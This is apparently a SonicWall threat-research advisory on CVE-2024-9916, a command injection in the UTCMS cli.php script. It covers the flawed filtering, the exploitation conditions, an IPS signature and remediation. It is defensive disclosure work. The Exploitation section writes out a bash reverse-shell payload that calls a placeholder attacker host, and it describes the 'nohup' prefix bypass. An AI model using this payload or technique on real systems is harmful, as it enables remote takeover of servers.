Command Injection in HuangDou UTCMS (CVE-2024-9916) Enables RCE

Overview

The SonicWall Capture Labs threat research team would like to highlight the vulnerability listed under CVE-2024-9916, as it remains unpatched and poses a potential risk to customer environments. Below is an analysis of the vulnerability itself, along with the mitigation measures against exploits that may target this vulnerability.

CVE-2024-9916 is an OS command injection (CWE-78) in HuangDou UTCMS V9, also mapped via CPE to Usualtool UsualtoolCMS 9.0, caused by improper neutralization of the parameter “o” in app/modules/ut-cac/admin/cli.php. A remote, unauthenticated attacker can send crafted HTTP requests to cli.php that forward attacker-controlled input to an operating system shell, enabling arbitrary command execution without user interaction. NVD rates the flaw 9.8 on the CVSS 3.1 scale, and EPSS estimates a 73.42% likelihood of exploitation within 30 days. Public exploit details are available, and coordination notes indicate the vendor did not respond. The CVE was published on October 13, 2024, and last modified on October 16, 2024. Successful exploitation can fully compromise the CMS host, enabling data exfiltration, content manipulation, lateral movement, and service disruption. Until an official fix is available, restrict or remove access to cli.php, disable the ut-cac module, validate and sanitize server-side parameters, avoid unsafe command execution practices, enforce least privilege and network segmentation, and apply IPS signatures designed to detect and block malicious use of the o parameter. Continuous monitoring for anomalous child processes and outbound connections is also recommended.

Technical Overview

The flaw is in the CAC module’s admin script cli.php. The script reads user input from the POST parameter 'o', performs only superficial replacement of a few characters, and then passes the resulting string to shell_exec() if it begins with an allowed prefix (e.g., 'cd/php/nohup/composer'). Because there is no authentication gate around this file, and because shell metacharacters such as backticks and $() are not neutralized, remote attackers can execute arbitrary commands.

Figure_01(1).png — Figure 1: Vulnerable Code in cli.php

The vulnerability exploits a fundamentally flawed input validation approach that attempts to secure systems through pattern matching rather than proper sanitization. On line 2 of Figure 1, the code attempts to filter the user-supplied `$_POST["o"]` parameter by removing URL-encoded ampersands (`%26`), pipes (`%7C`), and their literal equivalents (`&` and `|`). However, this filtering is trivially bypassed because it does not address other dangerous shell metacharacters such as semicolons (`;`), backticks ( ` ), command substitution (`$()`), or newlines. Line 3 implements a prefix-based whitelist check, allowing commands that begin with `cd`, `php`, `nohup`, or `composer`. Once this check passes, line 4 executes the unsanitized user input directly via `shell_exec($o)`, which spawns a system shell and returns the command output. An attacker can exploit this by prefixing malicious commands with one of the allowed strings (most commonly `nohup`) and then chaining arbitrary commands using semicolons or other shell operators.

Figure_02(1).png — Figure 2: nohup string

This interaction exposes a critical design flaw in the CAC (Command Administration Console) module authored by HuangDou, where insufficient input validation allows remote attackers to bypass the script's weak filtering and prefix-based allowlist, thereby achieving unauthenticated remote code execution.

Figure_03(1).png — Figure 3: Author of HuangDou

Triggering the Vulnerability

The following conditions must be met for successful exploitation of CVE-2024-9916:

Affected components and exploitation requirements:

Affected versions: The vulnerable file /app/modules/ut-cac/admin/cli.php exists in UTCMS V9 (May 2023) and remains unchanged through V10.3.1 (October 2025), with no vendor patch released since the October 2024 disclosure.
Network access: An attacker must reach the unauthenticated endpoint via an HTTP POST to /app/modules/ut-cac/admin/cli.php over HTTP or HTTPS (ports 80/443) from the internet, a VPN, or internal networks.
PHP configuration: The server must be running PHP 5/7/8 with shell_exec() enabled (i.e., not disabled in php.ini), which is common in default installations.
Web server permissions: Exploited commands execute as the web server user (for example, www-data, apache, nginx), allowing reads of application files (including database credentials), writes to uploads/ and cache/, process spawning, persistence, and potential local privilege escalation.
Network-layer defenses: No effective WAF, IPS signatures, or reverse-proxy filters are blocking POST payloads that include shell metacharacters after allowed prefixes (for example, nohup, php, cd, composer).

Exploitation

The following video demonstrates a complete exploitation chain for CVE-2024-9916, starting with unauthenticated command injection via HTTP POST to `/app/modules/ut-cac/admin/cli.php` and progressing to an interactive reverse shell on the vulnerable UTCMS V9 server. The demonstration illustrates how an attacker can exploit the `nohup` prefix bypass to execute a bash TCP redirect payload (`bash -i >& /dev/tcp/attacker_ip/4444 0>&1`), thereby establishing persistent remote access with full command execution capabilities under the web server's privileges. This proof-of-concept confirms the critical severity (CVSS 9.8) of the vulnerability and illustrates the immediate risk to unpatched UTCMS installations.

SonicWall Protections

SonicWall Network Security appliances with active IPS subscriptions protect against exploits targeting this vulnerability with the following signature(s):

IPS: 21617 “UTCMS ut-cac Command Injection”

Remediation Recommendations

The risks posed by CVE-2024-9916 can be mitigated or eliminated by:

• Remove or secure the vulnerable endpoint: Delete or restrict access to app/modules/ut-cac/admin/cli.php or enforce authentication before any command execution.

• Implement proper input validation and sanitization: Use strict allowlists, escape shell metacharacters, and replace shell_exec() with parameterized command execution.

• Apply the principle of least privilege: Run the web server with minimal permissions and disable risky PHP functions such as shell_exec(), exec(), and system().

• Utilize up-to-date IPS signatures: Detect and block POST requests to /app/modules/ut-cac/admin/cli.php containing suspicious command patterns in the o parameter.

• Implement network segmentation and continuous monitoring: Isolate the CMS in a restricted segment and monitor for anomalous processes or HTTP requests to the vulnerable endpoint.

Relevant Links

GitHub Security Advisory

National Vulnerability Database (NVD) Entry

CWE-78: OS Command Injection

CVSS v3.1 Calculator

EPSS Score History

Share This Article

An Article By

Security News

The SonicWall Capture Labs Threat Research Team gathers, analyzes and vets cross-vector threat information from the SonicWall Capture Threat network, consisting of global devices and resources, including more than 1 million security sensors in nearly 200 countries and territories. The research team identifies, analyzes, and mitigates critical vulnerabilities and malware daily through in-depth research, which drives protection for all SonicWall customers. In addition to safeguarding networks globally, the research team supports the larger threat intelligence community by releasing weekly deep technical analyses of the most critical threats to small businesses, providing critical knowledge that defenders need to protect their networks.

October 27, 2025
HijackLoader Delivered via SVG files
Read More
October 27, 2025
Oracle E-Business Suite Under Siege: Active Exploitation of Dual Zero-Days
Read More